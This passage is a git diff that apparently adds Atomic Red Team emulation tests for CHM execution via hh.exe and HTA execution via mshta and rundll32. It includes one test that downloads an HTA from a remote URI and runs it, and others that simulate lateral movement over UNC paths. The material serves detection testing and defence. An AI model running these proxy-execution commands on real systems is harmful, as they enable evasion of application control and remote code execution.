+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| topic_extension | Default Help Topic | string | html|
+| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
+| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
+| script_engine | Default Script Engine | string | JScript|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic
+Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| topic_extension | Default Help Topic | string | html|
+| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
+| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
diff --git a/atomics/T1218.001/T1218.001.yaml b/atomics/T1218.001/T1218.001.yaml
index 9ef61e03..e73024c3 100644
--- a/atomics/T1218.001/T1218.001.yaml
+++ b/atomics/T1218.001/T1218.001.yaml
@@ -43,3 +43,152 @@ atomic_tests:
hh.exe #{remote_chm_file}
name: command_prompt
+- name: Invoke CHM with default Shortcut Command Execution
+ auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
+ description: Executes a CHM file with the default Shortcut Command method.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM with InfoTech Storage Protocol Handler
+ auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+ description: Executes a CHM file with the ITS protocol handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM Simulate Double click
+ auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a
+ description: Executes a CHM file simulating a user double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM with Script Engine and Help Topic
+ auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5
+ description: Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ script_engine:
+ description: Default Script Engine
+ type: string
+ default: JScript
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM Shortcut Command with ITS and Help Topic
+ auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247
+ description: Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
\ No newline at end of file
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 7b35e97e..077398a1 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -18,6 +18,18 @@ Mshta.exe can be used to bypass application control solutions that do not accoun
- [Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-3---mshta-executes-remote-html-application-hta)
+- [Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement](#atomic-test-4---invoke-html-application---jscript-engine-over-local-unc-simulating-lateral-movement)
+
+- [Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click](#atomic-test-5---invoke-html-application---jscript-engine-simulating-double-click)
+
+- [Atomic Test #6 - Invoke HTML Application - Direct download from URI](#atomic-test-6---invoke-html-application---direct-download-from-uri)
+
+- [Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler](#atomic-test-7---invoke-html-application---jscript-engine-with-rundll32-and-inline-protocol-handler)
+
+- [Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler](#atomic-test-8---invoke-html-application---jscript-engine-with-inline-protocol-handler)
+
+- [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path)
+
@@ -109,4 +121,270 @@ remove-item "#{temp_file}" -ErrorAction Ignore
+
+
+
+## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
+Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_engine | Script Engine to use | string | JScript|
+| hta_file_path | HTA file name and or path to be used | string | Test.hta|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click
+Executes an HTA Application using JScript script engine simulating double click.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_engine | Script Engine to use | string | JScript|
+| hta_file_path | HTA file name and or path to be used | string | Test.hta|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - Invoke HTML Application - Direct download from URI
+Executes an HTA Application by directly downloading from remote URI.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+| hta_uri | URI to HTA | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
+Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rundll32_file_path | Location of rundll32.exe | string | $env:windir\system32\rundll32.exe|
+| script_engine | Script Engine to use | string | JScript|
+| protocol_handler | Protocol Handler to use | string | About|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler
+Executes an HTA Application with JScript Engine and Inline Protocol Handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+| script_engine | Script Engine to use | string | JScript|
+| protocol_handler | Protocol Handler to use | string | About|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path
+Executes an HTA Application with Simulate lateral movement over UNC Path.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml
index 6cc6af2c..84790d0a 100644
--- a/atomics/T1218.005/T1218.005.yaml
+++ b/atomics/T1218.005/T1218.005.yaml
@@ -50,4 +50,168 @@ atomic_tests:
mshta "#{temp_file}"
cleanup_command: |
remove-item "#{temp_file}" -ErrorAction Ignore
+ name: powershell
+
+- name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
+ auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447
+ description: Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - Jscript Engine Simulating Double Click
+ auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33
+ description: Executes an HTA Application using JScript script engine simulating double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick'
+ name: powershell
+
+- name: Invoke HTML Application - Direct download from URI
+ auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db
+ description: Executes an HTA Application by directly downloading from remote URI.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ hta_uri:
+ description: URI to HTA
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
+ auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af
+ description: Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ rundll32_file_path:
+ description: Location of rundll32.exe
+ type: string
+ default: $env:windir\system32\rundll32.exe
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - JScript Engine with Inline Protocol Handler
+ auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+ description: Executes an HTA Application with JScript Engine and Inline Protocol Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - Simulate Lateral Movement over UNC Path
+ auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362
+ description: Executes an HTA Application with Simulate lateral movement over UNC Path.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}'
name: powershell
\ No newline at end of file
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 9123d06f..e4d70e0f 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -578,3 +578,18 @@ da75ae8d-26d6-4483-b0fe-700e4df4f037
342cc723-127c-4d3a-8292-9c0c6b4ecadc
1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
+14920ebd-1d61-491a-85e0-fe98efe37f25
+cbbff285-9051-444a-9d17-c07cd2d230eb
+e9f2b777-3123-430b-805d-5cedc66ab591
+2988133e-561c-4e42-a15f-6281e6a9b2db
+29d6f0d7-be63-4482-8827-ea77126c1ef7
+b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+5decef42-92b8-4a93-9eb2-877ddcb9401a
+4f83adda-f5ec-406d-b318-9773c9ca92e5
+15756147-7470-4a83-87fb-bb5662526247
+007e5672-2088-4853-a562-7490ddc19447
+58a193ec-131b-404e-b1ca-b35cf0b18c33
+39ceed55-f653-48ac-bd19-aceceaf525db
+e7e3a525-7612-4d68-a5d3-c4649181b8af
+d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+b8a8bdb2-7eae-490d-8251-d5e0295b2362